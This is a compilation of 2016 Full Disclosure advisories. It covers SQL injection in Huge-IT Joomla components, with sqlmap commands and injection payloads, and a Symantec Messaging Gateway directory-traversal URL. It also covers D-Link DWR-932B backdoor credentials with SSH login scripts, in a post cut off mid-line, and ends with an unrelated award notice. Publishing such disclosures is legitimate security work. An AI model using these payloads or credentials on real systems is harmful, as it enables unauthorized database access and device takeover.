[FD] Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-catalog/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com
Description:
Huge-IT Product Catalog is made for demonstration, sale, advertisements for
your products. Imagine a stand with a
variety of catalogs with a specific product category. To imagine is not
difficult, to use is even easier.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL
into functions via 'load_more_elements_into_catalog' located in ajax_url.php.
Vulnerable Code in : ajax_url.php
11 define('_JEXEC', 1);
12 defined('_JEXEC') or die('Restircted access');
.
.
.
308 } elseif ($_POST["post"] == "load_more_elements_into_catalog") {
309 $catalog_id = $_POST["catalog_id"];
310 $old_count = $_POST["old_count"];
311 $count_into_page = $_POST["count_into_page"];
312 $show_thumbs = $_POST["show_thumbs"];
313 $show_description = $_POST["show_description"];
314 $show_linkbutton = $_POST["show_linkbutton"];
315 $parmalink = $_POST["parmalink"];
316 $level = $_POST['level'];
.
.
.
359 $query->select('*');
360 $query->from('#__huge_it_catalog_products');
361 $query->where('catalog_id =' . $catalog_id);
362 $query->order('ordering asc');
363 $db->setQuery($query, $from, $count_into_page);
CVE-2016-1000125
Exploit Code:
• $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php'
--data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*"
--level=5 --risk=3
•
• Parameter: #1* ((custom) POST)
• Type: error-based
• Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
• Payload:
prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY
CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0
END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING
MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
•
• Type: AND/OR time-based blind
• Title: MySQL >= 5.0.12 time-based blind - Parameter replace
• Payload:
prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN
(7371=7371) THEN SLEEP(5) ELSE 7371
END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
•
• Type: UNION query
• Title: Generic UNION query (random number) - 15 columns
• Payload:
prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL
SELECT
2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)--
FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
• ---
• [16:48:10] [INFO] the back-end DBMS is MySQL
• web server operating system: Linux Debian 8.0 (jessie)
• web application technology: Apache 2.4.10
• back-end DBMS: MySQL >= 5.0.12
• [16:48:10] [WARNING] HTTP error codes detected during run:
• 500 (Internal Server Error) - 6637 times
• [16:48:10] [INFO] fetched data logged to text files under
'/home/larry/.sqlmap/output/example.com'
•
• [*] shutting down at 16:48:10
•
Advisory: http://www.vapidlabs.com/advisory.php?v=171
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-15
Download Site: http://huge-it.com/joomla-video-gallery/
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com
Description: A video slideshow gallery.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL
into functions located in ajax_url.php.
Vulnerable Code in : ajax_url.php
11 define('_JEXEC',1);
12 defined('_JEXEC') or die('Restircted access');
.
.
.
28 if($_POST['task']=="load_videos_content"){
29
30 $page = 1;
31
32
33 if(!empty($_POST["page"]) && is_numeric($_POST['page']) &&
$_POST['page']>0){
34 $paramssld='';
35 $db5 = JFactory::getDBO();
36 $query5 = $db->getQuery(true);
37 $query5->select('*');
38 $query5->from('#__huge_it_videogallery_params');
39 $db->setQuery($query5);
40 $options_params = $db5->loadObjectList();
41 foreach ($options_params as $rowpar) {
42 $key = $rowpar->name;
43 $value = $rowpar->value;
44 $paramssld[$key] = $value;
45 }
46 $page = $_POST["page"];
47 $num=$_POST['perpage'];
48 $start = $page * $num - $num;
49 $idofgallery=$_POST['galleryid'];
50
51 $query = $db->getQuery(true);
52 $query->select('*');
53 $query->from('#__huge_it_videogallery_videos');
54 $query->where('videogallery_id ='.$idofgallery);
55 $query ->order('#__huge_it_videogallery_videos.ordering
asc');
56 $db->setQuery($query,$start,$num);
CVE-2016-1000123
JSON: Export
Exploit Code:
• $ sqlmap -u
'http://example.com/components/com_videogallerylite/ajax_url.php'
--data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2"
--level=5 --risk=3
• .
• .
• .
• (custom) POST parameter '#1*' is vulnerable. Do you want to keep
testing the others (if any)? [y/N]
• sqlmap identified the following injection point(s) with a total of
2870 HTTP(s) requests:
• ---
• Parameter: #1* ((custom) POST)
• Type: error-based
• Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
• Payload: page=1&galleryid=-3390 OR 1 GROUP BY
CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0
END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING
MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2
•
• Type: AND/OR time-based blind
• Title: MySQL >= 5.0.12 time-based blind - Parameter replace
• Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5)
ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
• ---
• [19:36:55] [INFO] the back-end DBMS is MySQL
• web server operating system: Linux Debian 8.0 (jessie)
• web application technology: Apache 2.4.10
• back-end DBMS: MySQL >= 5.0.12
• [19:36:55] [WARNING] HTTP error codes detected during run:
• 500 (Internal Server Error) - 2714 times
• [19:36:55] [INFO] fetched data logged to text files under
'/home/larry/.sqlmap/output/192.168.0.4'
•
• [*] shutting down at 19:36:55
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=169
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [REVIVE-SA-2016-002] Revive Adserver - Multiple vulnerabilities
Revive Adserver Security Advisory REVIVE-SA-2016-002 http://www.revive-adserver.com/security/revive-sa-2016-002 CVE-IDs: TBA Date: 2016-09-28 Risk Level:Medium Applications affected: Revive Adserver Versions affected: <= 3.2.4 Versions not affected: >= 3.2.5, >= 4.0.0 Website: http://www.revive-adserver.com/ Vulnerability 1 - Reflected file download CVE-ID: TBA CWE-ID: CWE-79 CVSSv2: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) CVSSv3 Vector CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C CVSSv3 Base Score: 9.6 CVSSv3 Temporal Score: 8.9 Abdullah Hussam has reported via HackerOne that www/delivery/asyncspc.php was vulnerable to the fairly new Reflected File Download (RFD) web attack vector that enables attackers to gain complete control over a victim's machine by virtually downloading a file from a trusted domain. References == https://cwe.mitre.org/data/definitions/79.html https://github.com/revive-adserver/revive-adserver/commit/69aacbd2 Vulnerability 2 - Special Element Injection CVE-ID: TBA CWE-ID: CWE-75 CVSSv2: 2.1 (AV:N/AC:H/Au:S/C:N/I:P/A:N) CVSSv3 Vector CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:N/E:U/RL:O/RC:C CVSSv3 Base Score: 3.1 CVSSv3 Temporal Score: 2.7 Joel Noguera has reported via HackerOne that usernames weren't properly sanitised when creating users on a Revive Adserver instance. Especially, control characters were not filtered, allowing apparently identical usernames to co-exist in the system, due to the fact that such characters are normally ignored when an HTML page is displayed in a browser. The issue could have therefore been exploited for user spoofing, although elevated privileges are required to create users within Revive Adserver. References == https://cwe.mitre.org/data/definitions/75.html https://github.com/revive-adserver/revive-adserver/commit/05b1eceb Vulnerability 3 - Reflected XSS CVE-ID: TBA CWE-ID: CWE-79 CVSSv2: 4 (AV:N/AC:H/Au:N/C:P/I:P/A:N) CVSSv3 Vector CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N/E:U/RL:O/RC:C CVSSv3 Base Score: 4.2 CVSSv3 Temporal Score: 3.7 The HackerOne user pavanw3b has reported that the Revive Adserver web installer scripts were vulnerable to a reflected XSS attack via the dbHost, dbUser and possibly other parameters. It has to be noted that the window for such attack vectors to be possible is extremely narrow and it is very unlikely that such an attack could be actually effective. References == https://cwe.mitre.org/data/definitions/79.html https://github.com/revive-adserver/revive-adserver/commit/14ff73f0 https://github.com/revive-adserver/revive-adserver/commit/fcf72c8a Solution We strongly advise people to upgrade to the most recent 4.0.0 or 3.2.5 releases of Revive Adserver, including those running OpenX Source or older versions of the application. Contact Information The security contact for Revive Adserver can be reached at: . Please review http://www.revive-adserver.com/security/ before doing so. -- Matteo Beccati On behalf of the Revive Adserver Team http://www.revive-adserver.com/ signature.asc Description: OpenPGP digital signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software :
https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# DESCRIPTION:
# A charting component in the Symantec Messaging Gateway control center
does not properly sanitize user input submitted for charting requests.
# This could potentially result in an authorized but less privileged user
gaining access to paths outside the authorized directory.
# This could potentially provide read access to some files/directories on
the server for which the user is not authorized.
# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software :
https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# Vendor Advisory and Fix:
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
#
# _____ __
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
# | || '_ \| |_ / _ \| | _ / _ \ '_ \/ _ \ | |
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
# |___|_| |_|_| \___/ \|\___|_| |_| /_/ \_\_|
#
#
# DESCRIPTION:
#
# A charting component in the Symantec Messaging Gateway control center does
not properly sanitize user input submitted for charting requests.
# This could potentially result in an authorized but less privileged user
gaining access to paths outside the authorized directory.
# This could potentially provide read access to some files/directories on the
server for which the user is not authorized.
#
The problem relies in the package kavachart-kcServlet-5.3.2.jar , File :
com/ve/kavachart/servlet/ChartStream.java
The vulnerable code is
extends HttpServlet {
public void doGet(HttpServletRequest httpServletRequest,
HttpServletResponse httpServletResponse) {
block6 : {
try {
String string = httpServletRequest.getParameter("sn");
// Taking parameter "sn" and writing it to the "string
variable"
if (string == null) break block6;
String string2 = string.substring(string.length() - 3);
byte[] arrby =
(byte[])this.getServletContext().getAttribute(string);
// The string variable is passed here without any
sanitanization for directory traversal
// and you can successfully use this to do a directory
traversal.
if (arrby != null) {
httpServletResponse.setContentType("image/" + string2);
ServletOutputStream servletOutputStream =
httpServletResponse.getOutputStream();
httpServletResponse.setContentLength(arrby.length);
servletOutputStream.write(arrby);
this.getServletContext().removeAttribute(string);
break block6;
}
POC:
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Multiple vulnerabilities found in the Dlink DWR-932B (backdoor, backdoor accounts, weak WPS, RCE ...)
Hello,
Please find a text-only version below sent to security mailing lists.
The complete version on analysing the security in Dlink 932B LTE
routers is posted here:
https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
=== text-version of the advisory without technical explanations ===
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
## Advisory Information
Title: Multiple vulnerabilities found in the Dlink DWR-932B (backdoor,
backdoor accounts, weak WPS, RCE ...)
Advisory URL: https://pierrekim.github.io/advisories/2016-dlink-0x00.txt
Blog URL:
https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
Date published: 2016-09-28
Vendors contacted: Dlink
Release mode: Released
CVE: no current CVE
DWF: no current DWF
## Product Description
Dlink is a multinational networking equipment manufacturing corporation.
## Vulnerabilities Summary
The Dlink DWR-932B is a LTE router / access point overall badly
designed with a lot of vulnerabilities.
It's available in a number of countries to provide Internet with a LTE network.
It's a model based on the (in)famous Quanta LTE router models and
inherits some vulnerabilities.
The tests below are done using the latest available firmware (firmware
DWR-932_fw_revB_2_02_eu_en_20150709.zip,
model revision B,
/Share3/DailyBuild/QDX_DailyBuild/QDT_2031_DLINK/QDT_2031_OS/source/LINUX/apps_proc/oe-core/build/tmp-eglibc/sysroots/x86_64-linux/usr/bin/armv7a-vfp-neon-oe-linux-gnueabi/arm-oe-linux-gnueabi-gcc).
The summary of the vulnerabilities is:
- Backdoor accounts
- Backdoor
- Default WPS PIN
- Weak WPS PIN Generation - with a reverse-engineered algorithm
- Leaking No-IP account (?)
- Multiple vulnerabilities in the HTTP daemon (qmiweb)
- Remote FOTA (Firmware Over The Air)
- Bad security practices
- Security removed in UPnP
A personal point of view: at best, the vulnerabilites are due to
incompetence; at worst, it is a deliberate act of security sabotage
from the vendor. Not all the vulnerabilities found have been disclosed
in this advisory. Only the significant ones are shown.
This router is still on sale.
Due to lack of security patches provided by the vendor, the
vulnerabilities will remain unpatched and customers with questions
should contact their local/regional D-Link support office for the
latest information.
## Details - Backdoor accounts
By default, telnetd and SSHd are running in the router.
Telnetd is running even if there is no documentation about it:
user@kali:~$ cat ./etc/init.d/start_appmgr
[...]
#Sandro { for telnetd debug...
start-stop-daemon -S -b -a /bin/logmaster
#if [ -e /config2/telnetd ]; then
start-stop-daemon -S -b -a /sbin/telnetd
#fi
#Sandro }
[...]
2 backdoor accounts exist and can be used to bypass the HTTP
authentication used to manage the router.
admin@homerouter:~$ grep admin /etc/passwd
admin:htEcF9TWn./9Q:168:168:admin:/:/bin/sh
admin@homerouter:~$
The password for admin is 'admin' and can be found in the /bin/appmgr
program using IDA:
About the root user:
user@kali:~$ cat ./etc/shadow
root:aRDiHrJ0OkehM:16270:0:9:7:::
daemon:*:16270:0:9:7:::
bin:*:16270:0:9:7:::
sys:*:16270:0:9:7:::
sync:*:16270:0:9:7:::
games:*:16270:0:9:7:::
man:*:16270:0:9:7:::
lp:*:16270:0:9:7:::
mail:*:16270:0:9:7:::
news:*:16270:0:9:7:::
uucp:*:16270:0:9:7:::
proxy:*:16270:0:9:7:::
www-data:*:16270:0:9:7:::
backup:*:16270:0:9:7:::
list:*:16270:0:9:7:::
irc:*:16270:0:9:7:::
gnats:*:16270:0:9:7:::
diag:*:16270:0:9:7:::
nobody:*:16270:0:9:7:::
messagebus:!:16270:0:9:7:::
avahi:!:16270:0:9:7:::
admin@kali:~$
Using john to crack the hashes:
user@kali:~$ john -show shadow+passwd
admin:admin:admin:/:/bin/sh
root:1234:16270:0:9:7:::
2 password hashes cracked, 0 left
user@kali:~$
Results:
- admin has password admin
- root has password 1234
Working exploit for admin:
user@kali:~$ cat quanta-ssh-default-password-admin
#!/usr/bin/expect -f
set timeout 3
spawn ssh admin@192.168.1.1
expect "password: $"
send "admin\r"
interact
user@kali:~$ ./quanta-ssh-default-password-admin
spawn ssh admin@192.168.1.1
admin@192.168.1.1's password:
admin@homerouter:~$ id
uid=168(admin) gid=168(admin) groups=168(admin)
admin@homerouter:~$
Alternatively, you can fetch it at
https://pierrekim.github.io/advisories/quanta-ssh-default-password-admin.
Working exploit for root:
user@kali:~$ cat quanta-ssh-default-password-root
#!/usr/bin/expect -f
set timeout 3
spawn ssh root@192.168.1.1
expect "password: $"
send "1234\r"
interact
user@kali:~$ ./quanta-ssh-default-password-root
spawn ssh root@192.168.1.1
root@192.168.1.1's pa
[FD] Edward Snowden won Glas of Reason - (Glas der Vernunft) Award 2016
Award 2016 "Glas of Reason" (Glas der Vernunft) for Edward Snowden (10.000€) @snowden - Security Press Articles http://www.mirror.co.uk/news/world-news/german-city-gives-nsa-whistleblower-8913033 http://www.bild.de/wa/ll/bild-de/unangemeldet-42925516.bild.html http://www.stern.de/panorama/kasseler-buergerpreis-geht-an-edward-snowden-7073662.html http://www.zdnet.de/88272377/glas-der-vernunft-kasseler-buerger-ehren-edward-snowden/ http://www.zeit.de/news/2016-09/25/auszeichnungen-kasseler-buergerpreis-geht-an-edward-snowden-25061402 http://www.focus.de/regional/kassel/auszeichnungen-kasseler-buergerpreis-geht-an-edward-snowden_id_5984583.html https://www.heise.de/newsticker/meldung/Edward-Snowden-mit-Kasseler-Buergerpreis-ausgezeichnet-3331286.html - http://hessenschau.de/tv-sendung/video-21974.html https://www.hna.de/kassel/glas-vernunft-kassel-verliehen-snowden-wurde-zugeschaltet-6782520.html http://www.wetter.de/cms/edward-snowden-mit-kasseler-buergerpreis-das-glas-der-vernunft-ausgezeichnet-4012717.html http://www.arcor.de/content/aktuell/regional_news/hessen/5238264,1,Auszeichnungen--Edward-Snowden-mit-Kasseler-B%C3%BCrgerpreis-ausgezeichnet,content.html http://www.ffh.de/news-service/ffh-nachrichten/nController/News/nAction/show/nCategory/nordhessen/nId/77386/nItem/edward-snowden-bekommt-kasseler-buergerpreis.html http://www.dw.com/de/whistleblower-edward-snowden-erh%C3%A4lt-kasseler-b%C3%BCrgerpreis/a-35886447 http://www.ad-hoc-news.de/kassel-der-whistleblower-edward-snowden-wird-heute-mit--/de/News/51270557 http://www.kassel-live.de/?s=edward+snowden&submit=Suche - Note: The video recodings will be published transparently by an uncensored german source within the next days! Feel free to share and enjoy the unique statement. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
